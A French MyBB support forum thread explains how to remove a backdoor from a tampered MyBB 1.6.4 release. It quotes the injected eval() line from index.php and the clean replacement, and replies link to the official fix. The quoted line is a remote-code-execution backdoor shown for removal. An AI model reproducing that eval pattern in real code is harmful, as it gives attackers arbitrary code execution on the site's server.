MyBB.support, le portail francophone de MyBB
[Tuto] Corrigé la fail backdor mybb ! - Version imprimable

+- MyBB.support, le portail francophone de MyBB (https://mybb.fr)
+-- Forum : MyBB.fr (https://mybb.fr/forum-1.html)
+--- Forum : Support (https://mybb.fr/forum-5.html)
+--- Sujet : [Tuto] Corrigé la fail backdor mybb ! (/thread-5278.html)



[Tuto] Corrigé la fail backdor mybb ! - lilirageuse - 10-02-2012

Bonjour,
des rumeur court mais c'est là vérifiée une fail et bien et belle présente sur mybb elle est meme sur l'index Wink
dans index.php
trouver
Citation ://Checks to make sure the user can login; they haven't had too many tries at logging in.
//Function call is not fatal
if(login_attempt_check(false) !== false)
{
eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);
}


Remplacer par :

Citation ://Checks to make sure the user can login; they haven't had too many tries at logging in.
//Function call is not fatal
if(login_attempt_check(false) !== false)
{
eval("\$loginform = \"".$templates->get("index_loginform")."\";");
}

Merci de l'aide de uknown Wink


RE: [Tuto] Corrigé la fail backdor mybb ! - exdiogene - 10-02-2012

Je confirme que la version de mybb 1.6.4 fût altérée dans l'ignorance la plus totale des développeurs de mybb.

Le correctif fût produit le 04-octobre-2011. Je suggère donc à ceux ayant téléchargé la version 1.6.4 avant cette date de faire une mise-à-jour rapidement!

P.S. Ce problème fût signalé le 1er novembre 2011 ici : http://www.mybb.fr/showthread.php?tid=4881&pid=27481


RE: [Tuto] Corrigé la fail backdor mybb ! - cfillion - 10-02-2012

..et la solution n'est pas de toi.
Pourquoi avoir posté un "correctif" pour une faille corrigée d'une ancienne version (la 1.6.6 vient de sortir) ?

http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/


RE: [Tuto] Corrigé la fail backdor mybb ! - lilirageuse - 10-02-2012

car tout le monde n'utilises pas la 1.6.6 comme moi -_-


 Utilitaire de traduction fourni par Regentronique